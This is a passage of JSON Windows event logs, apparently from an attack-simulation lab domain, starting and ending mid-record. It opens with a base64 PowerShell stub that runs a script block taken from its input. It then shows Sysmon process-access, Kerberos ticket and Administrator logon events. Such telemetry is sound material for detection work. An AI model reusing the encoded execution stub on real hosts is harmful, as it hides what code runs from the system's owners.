JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5402,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4184\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","SourceProcessId":"4984","SourceThreadId":"4184","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5403,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5404,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5405,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5406,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5407,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220550,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220551,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D92923DA-CBA2-281E-6820-146722971F2E}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D92923DA-CBA2-281E-6820-146722971F2E}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220552,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{D92923DA-CBA2-281E-6820-146722971F2E}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{D92923DA-CBA2-281E-6820-146722971F2E}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220553,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7E458\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{D92923DA-CBA2-281E-6820-146722971F2E}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited 